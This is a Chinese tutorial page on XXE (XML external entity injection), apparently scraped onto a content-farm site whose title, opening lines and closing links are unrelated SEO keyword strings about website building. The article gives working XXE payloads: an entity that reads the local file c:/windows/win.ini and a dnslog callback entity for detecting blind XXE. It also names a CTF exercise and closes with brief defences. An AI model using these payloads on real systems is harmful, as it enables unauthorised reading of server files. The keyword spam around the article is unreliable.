当前位置: 首页 > news >正文

做个简单网站大概多少钱网站内部链接怎麽做

做个简单网站大概多少钱,网站内部链接怎麽做,江苏南京建设局官方网站,怎么分析网站建设的优缺点一、概述 1、XXE:XML外部实体注入攻击 2、XML:可扩展标记语言。 (1)没有固定标签,所有标签都可以自定义,但有限制规则。 (2)用于数据对的传输与存储,常被用于充当配置文件 推荐教程:XML 教程 (3)后缀…

一、概述

1、XXE:XML外部实体注入攻击

2、XML:可扩展标记语言。

(1)没有固定标签,所有标签都可以自定义,但有限制规则。

(2)用于数据对的传输与存储,常被用于充当配置文件

推荐教程:XML 教程

(3)后缀名:*.xml

(4)语法规则:格式正确完整

3、XXE攻击原理:攻击者通过恶意的外部实体,当解析者解析包含恶意外部实体且未对其进行过滤,造成命令执行,目录遍历。

二、利用

1、存在:

  • 看URL是.ashx后缀
  • 存在明显的XML标签
  • 是POST请求,content-type:application/xml、text/xml、application/json(发现更改为application/xml看看)

2、限制条件:是否开启外部实体解析

3、攻击方式:有回显和无回显(盲攻击)

4、Payload:

#尝试,判断漏洞存在
<?xml version="1.0"?>
<!DOCTYPE info [
<!ENTITY xxe "你好" > ]>
<info>&xxe;</info>
#利用
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM
"file:///c:/windows/win.ini" >
]>
<foo>&xxe;</foo>

5、利用dnslog判断是否存在xxe漏洞(靶场pikachu-xxe漏洞)

(1)、修改payload

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE info [
<!ENTITY xxe SYSTEM
"http://dnslog.cn暂时域名" >
]>
<info>&xxe;</info>

(2)、回到dnslog网址看是否有域名解析了

6、练习(ctf题目):http://web.jarvisoj.com:9882/

7、思路

  • 无回显,BP抓包
  • 判断是否存在xxe漏洞
  • 深度利用

三、补充

1、工具:XXE injector

资料:https://www.cnblogs.com/AgainKjh/p/14639186.html

2、防御

  • 升级版本,禁止外部实体解析
  • 过滤用户提交的数据
http://www.yayakq.cn/news/462892/

相关文章:

  • 做自己点击网站网站建设z
  • 印刷建设网站京东商城官网入口
  • 电商网站的付款功能推广平台 赚佣金
  • 网站建设与维护实训总结wordpress博客美化
  • 各行各业网站建设口碑好一流的上海网站建设公司
  • 安徽营销型网站建设网站建设企业类型是什么
  • 谷歌做英文网站黑龙江建设局官网
  • 游戏制作公司开发深圳百度网站排名优化
  • 做网站运营有前途深圳电子厂排名前十
  • 众筹网站搭建wonder audio wordpress
  • php mysql 企业网站源码wordpress设置文章固定标题
  • 广西茶叶网站建设上海网站开发售后服务
  • 网站建设合同内容深圳市做网站的
  • 专业建网站的学校长沙网站开发方案
  • seo技术 快速网站排名软件开发发布平台
  • 泰州网站制作方案企业推广方式
  • h5高端网站开发网页模板免费源码
  • 电子商务网站推广论文两台wordpress共享mysql
  • 网站界面设计有哪些wordpress使用有字库
  • 网站弄好了怎么推广免费自助建站系统大全
  • 网站自定义模块如何建立公司网站意味着什么
  • 厦门外贸网站搭建苏州市网站建设培训
  • 做网站策划需要用什么软件整个网站与网站模板的区别
  • 一般网站建设费用新乡百度网站优化排名
  • 建设网站需要花费宁夏住房和城乡建设厅网站执业资格
  • 自己做的网站设定背景图像wordpress1.0下载
  • 做网站的开发工具wordpress 动态菜单
  • 做基网站空间站做网站有什么
  • 专门做奢侈品的网站有哪些域名注册网站搭建
  • 住房建设部网站 保定创意互动 网站建设